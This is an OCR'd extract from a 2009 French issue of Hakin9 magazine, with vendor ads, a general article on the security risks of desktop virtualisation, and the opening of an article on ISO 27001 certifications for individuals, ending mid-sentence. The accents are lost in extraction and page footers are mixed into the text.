Herv Schauer Consultants : 17 ans d'expertise en Scurit des Systmes d'Information Nos formations techniques en scurit et ISO27001 sont proposes Paris, Toulouse, et Marseille. http://www.hsc.fr/services/formations/cataloguehsc.pdf Informations : formations@hsc.fr - +33 (0)141 409 704

TippingPoint

TippingPoint est un leader mondial dans la prvention des intrusions rseaux (Network IPS) de 50Mbps 10Gigabits ainsi que la vrification dintgrit de poste et le contrle daccs du rseau (NAC). Tl : 01 69 07 34 49, E-mail : francesales@tippingpoint.com http://www.tippingpoint.com

Sysdream

Cabinet de conseil et centre de formation spcialis en scurit informatique. Lexprience c'est avant tout les recherches publiques, visant amliorer la scurit des applications et des systmes dinformations. Les rsultats disponibles sur des portails de recherche, dans la presse spcialiss. http://www.sysdream.com

MICROCOMS

Microcoms est une socit spcialise dans les produits Microsoft qui a pour vocation d'aider les particuliers, les TPE-PME et les professions librales sur 6 axes principaux de l'informatique : Assister, Dpanner, Conseiller, Scuriser, Former, Maintenir. Tl. : 01.45.36.05.81 e-mail : contact@microcoms.net http://www.microcoms.net

Club .PRO

ALTOSPAM

Ne perdez plus de temps avec les spams et les virus. Scurisez simplement vos emails professionnels. ALTOSPAM est un logiciel externalis de protection de la messagerie lectronique : anti-spam, anti-virus, anti-phishing, anti-scam... Testez gratuitement notre service, mis en place en quelques minutes. http://www.altospam.com OKTEY 5, rue du Pic du Midi 31150 GRATENTOUR

59_prenumerata_PRO.indd

2009-01-05, 18:22

FOCUS
GRGORY CARLET

Approche
de la virtualisation des postes de travail
Depuis quelque temps, nous apercevons un nouveau concept dans de nombreux magazines spcialiss ou mme grand public : la virtualisation. Dans cet article, nous allons voir ce qu'est exactement ce procd, ainsi que son utilit. Nous vous montrerons les diffrentes mthodes de virtualisation ainsi que la manire de les mettre en uvre.

Degr de difficult

CET ARTICLE EXPLIQUE...

Les principes de la virtualisation. La mise en uvre d'une solution de virtualisation. Les buts de la virtualisation d'un poste de travail. Les dangers scuritaires que chacune des mthodes peut entraner.

CE QU'IL FAUT SAVOIR...

Une bonne connaissance de l'architecture hardware d'un ordinateur, ainsi que du modle OSI. Une bonne connaissance des diffrents protocoles rseau. Une ide des failles des diffrents protocoles de transmissions de donnes (mme si ceux-ci vont tre dcrit pendant l'article). 60 HAKIN9 2/2009

ujourd'hui, de nombreux appareils se trouvent connects Internet : tlphone, ordinateur portable, ordinateur personnel, etc. Ceci pose alors un problme de base : Sur quoi faut-il stocker ses documents afin de pouvoir les consulter en permanence. Effectivement, on aimerait pouvoir consulter tranquillement depuis son tlphone portable un fichier quelconque et tlcharg, mais comment faire ? On pense alors trs rapidement mettre en place un disque dur connect Internet et sur lequel on va transfrer tous nos fichiers. La prochaine tape est l'utilisation des logiciels pour effectuer cette tche. Prenons un exemple : Mr X a reu par mail un fichier Urgent.dufz sur son ordinateur de bureau. Celui-ci contient des comptes rendre vrifis son patron le lendemain matin et la premire heure. Il est 18h et Mr X doit rcuprer sa femme au travail dans 10min. Il ne peut donc le faire maintenant. Il rcupre ses affaires et part la gare, pensant travailler chez lui ce soir. Arriv la gare, on lui annonce que le train 1h de retard. Il prend donc son tlphone, se connecte Internet, rcupre son fichier qu'il a plac sur son disque dur rseau, mais l problme ! Le fichier .dufz ne s'ouvre qu'avec le logiciel CompteDufz et celui-ci n'est disponible que pour Windows XP. Ainsi il y a 2 solutions au moins ce problme : Tendre vers un OS (Operating System) unique pour tous les appareils : Trs difficile

compte tenu de la diversit des machines (entre un tlphone, un baladeur numrique, un ordinateur, etc...) et de surcroit pas trs lgal dans de nombreux pays (position de monopole), Ne plus tre dpendant de l'OS de notre machine pour faire fonctionner tel ou tel logiciel.

La deuxime solution s'appelle la virtualisation. Il s'agit en fait de faire fonctionner les logiciels sur une autre plateforme qui va venir se greffer sur notre OS. Il y a 2 cas trs distincts de fonctionnement de la virtualisation : Faire fonctionner sur tel OS (par ex : Mac OS) un logiciel destin une autre plateforme (par ex : XP), Faire fonctionner distance via Internet un ordinateur spar fonctionnant avec un OS diffrent (par exemple Symbian et Linux).

Les deux mthodes sont illustres respectivement en Figure 1 et Figure 2.

La virtualisation d'un OS diffrent sur un ordinateur

Cette mthode a pour but de pouvoir utiliser tous les logiciels disponibles (quelque soit la plate-forme de distribution) sans avoir installer tous les OS existants et surtout sans

60_61_62_63_64_65_wirtualizacja_fr_mt2.indd

60

2009-01-05, 19:41

VIRTUALISATION DES POSTES DE TRAVAIL

avoir a redmarrer notre machine pour les excuter ! En effet, rien n'est plus agaant que de devoir redmarrer notre machine afin de convertir tel fichier au standard Mac OS alors que nous sommes sous Windows, par exemple. Cela prend en plus du temps. On rverait de voir fonctionner pleinement les 2 OS simultanment sur notre machine. En consquence, il existe tant l'achat qu'en tlchargement libre des applications nomms virtualiseur. Le principe de fonctionnement est trs simple (dtaill Figure 1) : Vous installez votre version du virtualiseur correspondant votre OS, celui-ci cr une image disque sur votre disque dur, et fait virtuellement redmarrer une partie de votre ordinateur partir de cette image disque, comme si c'tait votre disque dur systme. Vous pouvez alors pleinement profiter de vos deux OS simultanment (Figure 3) tout en ayant accs tous les priphriques de votre machine (USB, Firewire, etc). Vous trouverez en lien 1,2,3 et 4 les adresses Internet et noms des 4 logiciels les plus connus de virtualisation. Cette utilisation magique d'un ordinateur toutefois 2 soucis majeurs : les performances et la scurit. Question performance, tout d'abord, chaque OS virtualis (on peut effectivement en virtualiser plusieurs simultanment) se verra attribuer des ressources de la machine de manire spcifique. Celles-ci sont plus ou moins paramtrables selon le logiciel de virtualisation utilis, et le gros souci reste l'aspect vido de l'OS virtualis. En effet, la carte graphique de l'ordinateur devra prendre en charge l'affichage de l'OS original, l'affichage de la fentre de virtualisation et de faon virtualise l'affichage du deuxime OS. Autant vous dire que si vous virtualisez un OS fortement charg de manire graphique, il ne faut pas s'attendre un exploit! De plus, il sera trs difficile de faire fonctionner trs haute dfinition des applications demandant des performances graphiques importantes. Ce domaine avance au fur et mesure des versions de logiciel successives, mais on en revient toujours au point de dpart concernant la virtualisation : Un seul ordinateur fait fonctionner 2 OS, les performances de chaque OS seront donc amoindries. On peut aussi choisir d'affecter tel ou tel matriel (ou port de communication) tel ou tel OS, mais on ne pourra pas avoir simultanment le mme matriel sur les 2 OS (en tout cas pour tous les ports de communication et divers graveurs, lecteurs CD, etc.). Question scurit, beaucoup de paramtres sont prendre en compte afin d'obtenir une solution virtualise fiable et scurise. Dtaillons un peu le fonctionnement d'une machine sur laquelle tourne plusieurs OS : La couche matriel est la mme pour les 2 OS, Un premier OS sert de support au deuxime OS, L'utilisateur dispose d'un accs physique sur la machine (mais qu'en est-il en rseau local ou en VPN, etc). systme. Heureusement, le systme d'exploitation hte fonctionne sur un processeur avec une protection en anneau. Les anneaux limitent l'accs certaines ressources en allant de l'anneau le plus eloign (le moins scuris) l'anneau le plus proche (ring0, l'anneau le plus scuris). Le matriel restreint ainsi le passage d'un anneau l'autre, protgeant ainsi de nombreuses effractions de scurit. Evoques lors du deuxime point, toutes les ressources peuvent tre partages entre les 2 OS, mme (et surtout dans notre tude de scurit) le rseau qu'il soit Ethernet ou sans fil. Comme toujours, c'est le logiciel virtualiseur qui va nous permettre de choisir nos modes de rglages de l'accs rseau du deuxime OS. La plupart du temps, on peut choisir d'utiliser un accs NAT ou de crer un autre rseau ( partir de la mme carte rseau), etc. Mais dans tous les cas, un accs rseau pourra tre command sur la machine virtuelle (en effet, une page Internet demande par le navigateur de la machine virtuelle se charge belle et bien). Il faudra donc protger sa machine virtuelle comme s'il s'agissait d'un poste rel afin de garantir une base de scurit sur la machine globale. En effet si un individu arrive obtenir un accs sur la machine virtuelle, rien ne l'empche de compromettre la machine hte, sauf si la liaison entre les 2 OS est surveille et scurise. Mme si les diteurs de logiciels de virtualisation s'accordent nous promettre que leurs logiciels sert (modrment) de pare-feu en empchant toute donne de transiter de faon illicite entre les deux OS, et mme si la majorit des virus tente la dtection d'un environnement virtualis (afin de s'arrter le cas chant), il n'endemeure pas moins

Commentons maintenant les problmes pouvant rsulter d'une telle configuration. Le fait qu'une seule machine fasse fonctionner des ressources alloues de manire autonome nous amne nous poser une question : Que se passerait-il si il y avait une mauvaise allocation des ressources ou pire si on effectuait une mauvaise allocation des ressources ? En effet, de nombreuses failles systmes se basent sur un principe de BufferOverflow (dpassement de mmoire tampon). Si celui-ci est effectu l'intrieur de l'OS principal, on se retrouve avec une faille classique, mais si l'on effectue celui-ci l'intrieur de l'OS virtualis, dans le pire des cas, on vient simultanment crire des donnes sur des ressources non attribues cet OS virtualis mais alloues au premier

Figure 1. Principe de fonctionnement d'une virtualisation intra-poste

2/2009 HAKIN9 61

60_61_62_63_64_65_wirtualizacja_fr_mt2.indd

61

2009-01-05, 18:22

FOCUS
qu'un ordinateur sur lequel fonctionnent plusieurs OS reste plus vulnrable qu'un ordinateur n'en faisant fonctionner qu'un seul (voir le lien Internet 6). On aura donc intrt bien rflchir son besoin la fois en terme de fonctionnalit et en terme de scurit avant de mettre en place une solution virtualise. Ainsi pour rsumer cette utilisation de la virtualisation, celle-ci permet de faire ce qu'aucun ordinateur ne peut faire nativement : excuter tous les programmes existants indpendamment de leur plateforme de production. Malheureusement cela un double cot : les performances globales de la machine et la scurit de celle-ci. Revenons quelque instant M.X souhaitant relire ses comptes au format .dufz en attendant sa femme la gare. Cette solution de virtualisation ne lui est d'aucune utilit, moins de virtualiser Windows XP sur son tlphone (trs difficile d'un point de vue ressource, mme en choisissant la virtualisation d'une version Windows Mobile..). Intervient ici la deuxime utilisation de la virtualisation des postes de travail : le dport du bureau sur une machine hte laquelle on accde via un rseau de communication. conservera tout de mme les points d'accs physiques (ports USB, Firewire, Ethernet, etc) ncessaire son fonctionnement. En rsum, cette machine devra tre dote de moyens d'interaction avec l'utilisateur mais ne devra pas forcment possder une norme puissance de calcul et de stockage. On a donc une rduction des cots informatiques variant de faon constante en fonction du nombre de postes clients utiliss et une mobilit extraordinaire du personnel. On peut aisment imaginer un lecteur commun entre tous les utilisateurs des OS virtuels permettant ainsi chacun de partager un travail collectif et de grer celui-ci de n'importe o. Le travail de bureau dlocalis devient donc accessible n'importe qui grce la mthode de virtualisation. Mais pour cela, il faut penser plusieurs choses (certaines ayant dj t voques dans le paragraphe prcdent) : La machine accueillant les OS virtuels sera fortement prouve question ressource, et ceci dpendant

ORDINATEUR PHYSIQUE

Aoolicationes de l'OS 2

Applications de l'OS 1

OS 2

Aoolicationes de Virtualisation

OS 1

Ressources matrielles

Le dport de l'environnement de travail appliqu la mobilit

Le deuxime intrt de la virtualisation est le suivant : Pouvoir se connecter un environnement de travail complet (un OS sur une machine) via une autre machine l'aide d'une connexion Internet. On se connectera donc une machine virtuelle sur laquelle on travaillera comme si on tait devant son propre poste de travail (Figure 2). Cette mthode possde deux avantages non ngligeables : Pour peu que l'interface entre la machine relle et la machine virtuelle soit bien conue, on pourra retrouver son poste de travail tel qu'on l'a laiss auparavant, La machine client n'aura plus du tout besoin d'tre performante puisqu'elle n'aura qu' afficher les donnes envoyes depuis la machine hte. Elle
HAKIN9 2/2009

Figure 2. Principe de fonctionnement d'une virtualisation entre 2 ordinateurs distants

ORDINATEUR PHYSIQUE CLINET ORDINATEUR PHYSIQUE HOTE

Affichage

Actions utilisateurs

OS Client

OS Hte

Ressources matrielles

Communication rseau Communication interne l'ordinateur

Ressources matrielles

Figure 3. Fonctionnement simultan de Windows XP et Mac OS sur le mme ordinateur en bi-cran (chaque cran montrant chaque OS)

62

60_61_62_63_64_65_wirtualizacja_fr_mt2.indd

62

2009-01-05, 18:23

VIRTUALISATION DES POSTES DE TRAVAIL

intgralement du nombre d'OS simultanment lanc sur celle-ci, Comme tout est calcul par la machine hte, la machine client n'aura pas besoin d'tre trs performante, cependant il faudra quand mme qu'elle puisse avoir un dbit d'informations rseaux trs important (toutes les informations de travail circulant via le rseau), La machine hte grant plusieurs OS virtuels simultanment et devant envoyer ces informations par le rseau, son accs rseau devra tre proportionnellement croissant en fonction du nombre d'utilisateurs simultans, Le rle de superviseur de la machine hte est essentiel. En effet, le travail de tous les clients dpendant uniquement du bon fonctionnement de la machine hte, il sera extrmement important que celle-ci fonctionne parfaitement et ce malgr les oprations ncessaires de mises jour de celle-ci, Le dbit, mais aussi la qualit du rseau devront tre prouvs avant la mise en place d'une telle solution, sans omettre non plus les oprations de maintenance obligatoire des routeurs, etc. Une solution parallle sera donc fortement recommande pour viter ainsi les problmes en cas de panne (et/ou de mise jour). crucial qu'il nous reste tudier, et de trs prs : la scurit d'une telle solution. failles potentiellement exploitables par l'attaquant, Le flux d'informations arrivant l'ordinateur client , pour les mmes raisons, Le stockage des informations personnelles sur l'ordinateur hte. En effet, celui-ci conserve des informations de connexion (mot de passe, etc.) en mmoire afin que le client retrouve son OS virtuel personnel tel qu'il la cr, Le transport des informations entre l'ordinateur hte et l'ordinateur client.

La scurit d'une solution virtualise : problmes, points sensibles et solutions

Commenons ce paragraphe par un petit schma trs simplifi mais permettant nanmoins de comprendre o vont se situer les problmes de scurit d'une telle configuration. Celui-ci est donn en Figure 5. On s'aperoit ainsi qu'il y a 4 points critiques principaux dans une telle architecture : Le flux d'informations arrivant l'ordinateur hte. S'il a t corrompu, il y a un risque norme de compromission de l'OS avec des

Tout d'abord, les deux premiers points sont assez similaires : les deux seules mthodes d'attaques sur les postes hte et client sont la compromission des donnes envoyes (ou reues) par ceux-ci, ou un envoi d'information depuis un poste tiers, directement sur les

ordinateur client 1
Routeur 1

Ordinateur hte 1

ordinateur client 2

Ordinateur hte 2

.........

Routeur de secours

HUB

La Figure 4 rsume de manire schmatique la mise en place d'un rseau de virtualisation de poste de travail et les premires solutions de secours envisageables lors de la mise en place d'un tel systme de travail. Le routeur de secours ne sert qu'en cas de panne ou de maintenance du routeur principal. Les multiples ordinateurs htes servent grr plusieurs connections clientes, et de plus peuvent permettre de combler une panne ou de la maintenance sur l'un des postes. La partie client estla partie la plus simple grr puisque l'on peut admettre une panne (facilement remplacable par n'importe quel nouvel utilisateur), alors que la partie droite doit tre compltement gre et doit prendre en compte les problmes de panne de manire rapide et sans aucun dommage pour l'utilisateur. Une fois tout ceci mis en place (ou seulement conu), il reste toutefois un point

ordinateur client N

Ordinateur hte N

Figure 4. Implmentation d'une solution de virtualisation distance

Ordinateur client

Ordinateur hte

Ordinateur attaquant

Ordinateur attaquant

Ordinateur attaquant

Figure 5. Schma d'un poste virtuel dport

2/2009 HAKIN9 63

60_61_62_63_64_65_wirtualizacja_fr_mt2.indd

63

2009-01-05, 19:36

FOCUS
ordinateurs. On peut toutefois noter qu'il est plus intressant d'attaquer l'ordinateur hte que le client. En effet, on le dtaillera plus tard, mais l'ordinateur hte risque de contenir plus de donnes personnelles que l'ordinateur client. Pour revenir au flux d'informations arrivant aux deux ordinateurs, si elles sont corrompues (peu importe le moyen et le but), on risque de crasher l'un des deux systmes (voir les deux). Il s'agit donc de protger les deux ordinateurs de ce genre de problme. Pour cela, un firewall et un antivirus, permettront (dans un premier temps) d'viter le plus gros des problmes. Par la suite, la mise en place de restrictions des connexions aux deux postes pourra tre mise en place, et les manquements ces restrictions pourront (et devront) tre tudis de prs par une personne tierce. Ceci est le rle du superviseur rseau. En plus des oprations de maintenance pouvant (devant dans l'idal) tre effectues par quelqu'un d'autre selon l'importance de l'entreprise, celui-ci devra surveiller tous les trafics frauduleux d'informations arrivant sur les deux postes (client et hte) et affiner les rgles de filtrages d'informations sur les deux ordinateurs. De plus, notre machine client est potentiellement vulnrable aussi. En effet, puisque les ports physiques de la machine soient accessibles l'utilisateurs. Il y a donc possibilit que celui-ci dispose d'un accs la machine. On peut donc facilement imaginer un attaquant qui utilise une cl USB ou un LiveCD pour attaquer le systme hte. Ainsi, si l'attaque a t prpare l'avance, les outils pourront tre facilement chargs sur la machine hte. Il faut donc prvoir cette introprabilit entre l'utilisateur et la machine et imaginer les risques de compromission afin de les radiquer. Un des points les plus sensibles en cas de corruption reste souvent l'inaccessibilit des donnes l'attaquant. Aucune donne crypte n'est dcryptable. Il s'agit uniquement d'un rapport entre le temps de dcryptage en fonction de la puissance de calcul et la motivation (intrt) de l'attaquant. Ainsi, on rduit le risque de dcryptage si l'attaquant est oblig de les dcrypter sur la machine (par exemple si les fichiers ne sont ni dplaable, ni copiable). Il en rsultera un abandon forc de la part de l'attaquant pour viter tout reprage. Afin de garantir une confidentialit des donnes prsentes sur le disque dur de la machine hte, nous commencerons par crypter celles-ci l'aide d'un algorithme assez rsistant ( dfinir en fonction de la confidentialit des donnes protger. Nous dfinions ensuite une politique de scurit sur tous les fichiers et dossiers crs dans chaque machine virtuelle sur la machine hte afin que seul le propritaire de la machine virtuelle puisse y accder l'aide d'un challenge ( dfinir encore en fonction de la confidentialit des donnes). Il y a peu d'intrt crypter avec un algorithme complexe une photo de vacances! Par contre, une double authentification pourrait tre envisage lors des accs aux fonctions de maintenance de la machine hte, ou un accs en mode super-utilisateur. De nombreux ouvrages (en livre ou sur le net, donnent de bonnes informations sur les politiques de protection des donnes, sur les changements rguliers de mot de passes chez les utilisateurs, etc. Nous vous invitons donc les consulter avant de mettre en place un rseau (en mode virtualis ou non d'ailleurs). Passons maintenant la partie contenant le plus de risque de scurit, le canal de transport des informations entre l'ordinateur client et l'ordinateur hte. En effet, si nous reprenons le schma de la Figure 4, nous pouvons facilement imaginer le cas o la machine virtualise ne se situe pas proximit de l'ordinateur client. La liaison entre les deux empruntera forcment le rseau Internet afin de connecter les deux ordinateurs. Mous peuvons donc facilement imaginer que l'attaquant cherchera faire une attaque de type Man-In-The-Middle afin d'obtenir de faon transparente toutes les informations (mot de passe, correspondance, etc) ncessaires usurper l'identit du client sur l'ordinateur hte et finalement rcuprer toutes les donnes confidentielles. Ce type d'attaque est le plus risqu dans le cas prsent. En effet, malgr toutes les protections mises en place, si l'attaquant se fait passer pour le vritable propritaire rien ne parat

Terminologie
Operating System (OS ou Systme d'exploitation en franais) : C'est un ensemble d'applications permettant la liaison entre la couche matriel de l'ordinateur (mmoire, processeur, etc) et les applications (traitement de texte, etc), Man In The Middle (MITM ou Attaque de l'Homme du Milieu en franais) : C'est un type d'attaque informatique consistant se placer de manire discrte entre deux postes de communication. Cette attaque n'est possible qu'en deux tapes : une phase d'observation des donnes changes entre les deux postes, suivie d'une inclusion de manire invisible entre les deux postes, Brute Force (ou attaque de Force Brute en franais) : C'est une mthode d'attaque pour casser une cl crypte en essayant toutes les possibilits. La dure de russite est donc trs dpendante de la puissance de calcul et de la longueur de la cl de cryptage, SSH (Secure Shell) : C'est la fois un protocole de transmission et un programme informatique. Le principe du protocole de transmission est d'changer des cls cryptes en dbut de transmission puis de transmettre toutes les donnes de manire cryptes par la suite.

Sur Internet
http://www.vmware.com/fr/ VMWare (multi-plateforme), http://www.parallels.com/ Parrallel (multi-plateforme), http://www.virtualbox.org/ VirtualBox (multi-plateforme), http://www.microsoft.com/france/windows/xp/virtualpc/default.mspx VirtualPC (Windows uniquement), http://xperts.sce.carleton.ca/2004-05/MITMV/ Attaque Man-In-The-Middle sur une connexion SSH. Page et rapport final en anglais uniquement mais extrmement complet. Le rapport se trouve sous le lien final report, http://www.journaldunet.com/solutions/securite/actualite/07/0914-virtualisation-risquessecurite.shtml Rapport de scurit sur les OS virtuels. Il s'agit d'un article d'un journal franais rsumant les problmes de base de la virtualisation d'un point de vue scuritaires, http://fr.wikipedia.org/wiki/Virtualisation La page Wikipdia sur la virtualisation, http://www.google.fr/search?num=200&hl=fr&q=virtualisation+securit%C3%A9 Une simple recherche Google mais contenant normment de lien trs intressant et souvent mis jour. Essentiel si vous souhaitez mettre en place votre solution virtualise.

64

HAKIN9 2/2009

60_61_62_63_64_65_wirtualizacja_fr_mt2.indd

64

2009-01-05, 18:23

VIRTUALISATION DES POSTES DE TRAVAIL

trange l'ordinateur hte, ni mme au superviseur au cas o celui-ci serait en train de regarder les trafics en temps rel ! Notre attaquant peut mme dcider de rester connect sur la machine hte pour dcrypter en ligne les mots de passe pendant des jours s'il le dsire puisqu'il aura rcupr un accs lgal. La base mme de toute notre scurit entre la machine et le client repose donc sur la voie de communication choisie entre les deux ordinateurs. Nous ne pourrons pas malheureusement pas faire un listing complet des types de connections entre 2 ordinateurs afin de protger les donnes. Nous nous contenterons de vous donner des indications basiques dans ce domaine, et vous donnerai aussi des liens Internet afin de vous documentez en fonction de vos besoins. Pour simplifier ce sujet, la complexit du canal de communication choisir dpend en tout premier lieu de l'importance des informations transitant entre les deux ordinateurs et les risques potentiels de vos machines (mme avant la mise en place de la virtualisation). En effet, si vous dcidez de mettre en place un ordinateur hte sur l'ordinateur de votre ami, pour vous y connecter avec votre ordinateur, il y a peu de risque qu'un hacker malveillant dcide de passer du temps vous attaquer. Par contre, si vous tes le patron d'une norme entreprise, il y a de forte chance que ce mme hacker essaye durant des jours entiers de soutirer les plus petites bribes d'informations sur vos ordinateurs ! Une fois le risque tabli, choisissez alors la solution P U de transfert d'informations entre vos deux ordinateurs, tout en sachant qu'il n'y a pas de solution miracle. Mme le protocole SSH (utilis entre autre pour des transferts d'informations bancaires) est attaquable avec un Man-In-The-Middle (lien 5). Nous nous conseillons donc, si vous souhaitez mettre en place une telle fonctionnalit, de vous renseigner trs prcisment sur la manire dont vous pourrez vous connecter l'ordinateur hte. En effet, si vous achetez une solution auprs d'un conseiller (ou si vous achetez un logiciel X ou Y), le choix du protocole de transmission vous sera impos. Ceci n'est en aucun cas un problme partir du moment o le risque d'attaque sur ce protocole est connu/ valu/maitris. Si vous mettez vous-mme en place votre solution virtualise (chose de plus en plus simple de nos jours), il faudra alors que votre liaison soit prouve et que vous vous teniez au courant des dernires attaques sur ce type de transmission. En effet, chaque protocole de transmission a une dure de vie face aux attaques extrieures (dpendant de plusieurs facteurs, dont l'avance technologique, l'volution des systmes, etc), il y a donc fort parier que vous ayiez effectuer de la maintenance ce niveau si votre solution virtuelle est amene durer dans le temps. Pour rsumer cette partie scurit entre deux machines via un rseau Internet, nous dirions qu'il s'agit en fait d'un problme simple, identique une connexion client/ serveur. Sauf que le serveur est ici un B L I C I autre ordinateur rpondant aux requtes du premier. Il s'agit donc de porter une attention particulire aux points voqus cidessus et de toujours faire un rapport entre l'intrt de mettre telle ou telle politique de scurit en uvre et l'importance des donnes concernes. Terminons cet article comme nous l'avons commenc : avec Monsieur X. Si celui-ci travaillait sur un poste virtualis dport, une fois la gare, l'aide d'un simple navigateur Internet, il aurait accs son fichier .dufz comme s'il tait son bureau, puisqu'il s'agit du mme environnement de travail. Il peut ainsi relire son fichier, annoter, corriger celui-ci sans aucun souci (comme au bureau), et accueillir sa femme l'heure tout en ayant fini son travail pour la soire.

Conclusion

La virtualisation dispose de deux intrts majeurs : la facilit d'utilisation, ainsi que la concentration des postes de travail diffrents en un seul, aussi la mobilit. Mais cela ne se fait pas sans heurt et peut rapidement se faire au dtriment des performances et de la scurit des donnes transfres. Il vous revient de dfinir les priorits et concessions possibles lors de la mise en place de ce type de systme. Grgory Carlet

Il y a maintenant 6 ans, l'auteur dcouvre l'utilisation d'un poste informatique et sa passion pour la scurit informatique et les rseaux. Pour le contacter : gregory.carlet@gmail.com

2/2009 HAKIN9

65

60_61_62_63_64_65_wirtualizacja_fr_mt2.indd

65

2009-01-05, 19:36

FOCUS
HERV SCHAUER

CERTIFICATIONS ISO 27001 POUR LES INDIVIDUS

Degr de difficult

Dans les formations en scurit, les formations avec une certification autour des normes ISO 27001 se sont fortement dveloppes depuis quelques annes. Le point pour y voir plus clair et savoir en profiter.

CET ARTICLE EXPLIQUE...

Les certifications ISO 27001 pour les individus. Le principe de la certification et de laccrditation des individus.

ppliquer la norme ISO 27001 permet d'organiser la scurit de l'information dans son organisme. Cela peut aller jusqu' la certification du Systme de Management de la Scurit de l'Information de l'organisme, SMSI, ou ISMS en anglais. En marge de la certification des systmes de management eux-mmes, s'est dveloppe la certification des individus, des personnes, afin de leur permettre de prouver leurs comptences. Ces certifications permettent de savoir quels sont ceux qui connaissent les principes de l'ISO 27001, et qui auront acquis les connaissances pour auditer ou implmenter un SMSI. La formation de tous ceux impliqus dans un SMSI est une exigence de l'ISO 27001 dans la mise en uvre du SMSI, article 4.2.2.e qui renvoi au 5.2.2. La certification de comptences, si elle est srieuse et impartiale, est le moyen le plus simple de savoir si un individu rpond a ses attentes en terme de connaissance du sujet.

Comment grer les risques dans un SMSI ? Comment auditer un SMSI selon les critres de l'ISO 27001 ?

La gestion de risque est la partie la plus complexe de la mise en oeuvre d'un SMSI (dans la phase PLAN de l'ISO 27001), et elle est obligatoire. L'audit interne est le premier mcanisme de vrification dans un SMSI (phase CHECK dans l'ISO 27001). De plus il permet aussi de certifier. C'est pour ces raisons que les certifications disponibles se dcoupent en trois formations : Les formations ISO 27001 Lead Implementer permettent d'apprendre mettre en oeuvre un SMSI. Elles durent gnralement 5 jours. Les formations ISO 27005 Risk Manager permettent d'apprendre grer les risques en scurit de l'information. Elles durent gnralement 3 jours. Les formations ISO 27001 Lead Auditor permettent d'apprendre auditer un SMSI. Elles durent gnralement 5 jours.

Quelles sont les certifications disponibles, quels sont les contenus

Les SMSI apportent trois problmatiques fondamentales :

CET QU'IL FAUT SAVOIR...

Aucune connaissance pralable nest necessaire pour cet article. 66 HAKIN9 2/2009

Comment mettre en place un systme de management de la scurit de l'information (SMSI) conforme la norme ISO 27001 ?

Selon de votre fonction, l'une, l'autre ou plusieurs d'entre elles rpondront vos besoin. Celui qui sera la fois implmenteur, gestionnaire de risques SI et auditeur est gnralement le RSSI (Responsable de la Scurit des Systmes d'Information) dans son organisme.

66_67_68_69_Pod_Lupa.indd

66

2009-01-05, 19:46

01

Les formations alternent gnralement cours magistraux et exercices individuels ou en groupe, avec plusieurs formateurs pour mieux encadrer les travaux dirigs. Le contenu des cours magistraux est bas sur les normes : ISO 27001 pour le SMSI, ISO 27002 pour les mesures de scurit, ISO 19011 pour l'audit de systme de management, ISO 27005 pour la gestion de risques, etc. C'est l'exprience du formateur qui permet d'apporter une comprhension aise des documents parfois rbarbatifs, il convient donc de bien valider l'exprience sur le terrain de ses formateurs.

s'aidant des ressources disponibles sur internet ou des livres. Les certifications des personnes sur les normes ISO 27001 imposent le suivi de la formation avant.

Dans ISO 27001 Lead Auditor, ISO 27001 rfre la norme ISO. Ce qui diffrencie une certification ISO 27001 ou ISO 27005 et une certification CISSP, c'est que d'un cot le rfrentiel est une norme, dans l'autre cas il ne l'est pas. Une norme ISO est un document ouvert, accessible tous, qui a t dvelopp de manire consensuelle afin que tous les experts de tous les pays du monde se mettent d'accord. Chaque pays vote formellement chaque nouvelle version du projet de norme et envoie ses commentaires qui sont traits un par un par le groupe de normalisation international qui justifie toutes ses dcisions une par une. Bien que la socit ISC2 ait dit un livre qui sert de rfrence, il n'y a pas de rfrentiel ouvert sur lequel les examens sont bass. La socit ISC2 qui dite le CISSP est la seule dfinit et connatre son rfrentiel et aucune autre socit que ISC2 ne peut faire de certification CISSP. Dans CISSP il y a Information Security. C'est une certification sur la connaissance du candidat en scurit de l'information. Les certifications sur les normes ISO couvrent en profondeur un champ beaucoup plus limit qui est l'organisation de la scurit, et une formation ISO 27001 Lead Auditor est avant tout une formation l'audit de systme de management, pas une formation la scurit. Enfin la certification au CISSP peut se passer en candidat libre, sans avoir suivi une formation particulire auparavant, en

Quelle diffrence avec le CISSP

La socit britannique BSI (www.bsiglobal.com), par ailleurs aussi organisme de normalisation pour la Grande Bretagne, a propos en 2002 les premires formations ISMS Lead Auditor. A l'poque c'tait par rapport la norme britannique BS7799-2:2002, avant que celle-ci ne devienne une norme internationale ISO 27001:2005. Le BSI agissait comme socit de formation, et a dvelopp un exercice de validation des acquis, aprs lequel tait dlivr un papier marqu Certificate. La socit britannique IRCA (www.irca.org), qui vend des services d'enregistrement d'auditeurs et de professionnels, a dvelopp un schma de certification ISMS Lead Auditor, selon un mode qui lui est propre, qui a t adopt par plusieurs socits de formation en Grande Bretagne comme BVQI, SGS et plus tard le BSI. Dbut 2003 l'ISO a publi la norme ISO 17024 valuation de la conformit

Quelle socit de certification choisir

Exigences gnrales pour les organismes de certification procdant la certification de personnes. Cette norme a t labore par le CASCO. Le CASCO de l'ISO est le comit pour l'valuation de la conformit, qui tabli par consensus international les normes fondatrices des systmes de certification dploys travers le monde et contrl par les tats. Le respect de la norme ISO 17024 permet une reconnaissance mutuelle et les changes de personnel au niveau mondial. Pour cela l'ISO 17024 spcifie les exigences qui assurent un fonctionnement homogne, comparable et fiable des organismes de certification qui mettent en oeuvre des dispositifs de certification de personnes., citation de la norme ellemme. En 2005, la socit franaise LSTI (www.lsti.fr), a dvelopp une certification ISO 27001 Lead Auditor. Elle a t accrdite conformment la norme ISO 17024 en juin 2006 (dossier n 04-0091) par le COFRAC (Comit Franais d'Accrditation) (www.cofrac.fr). D'autres certifications d'auditeurs dans d'autres domaines comme la qualit ou l'environnement sont disponibles auprs d'autres socits franaises comme AFNOR Certification (anciennement

Figure 1. Certification des auditeurs de SMSI

2/2009 HAKIN9 67

66_67_68_69_Pod_Lupa.indd

67

2009-01-05, 19:56

FOCUS
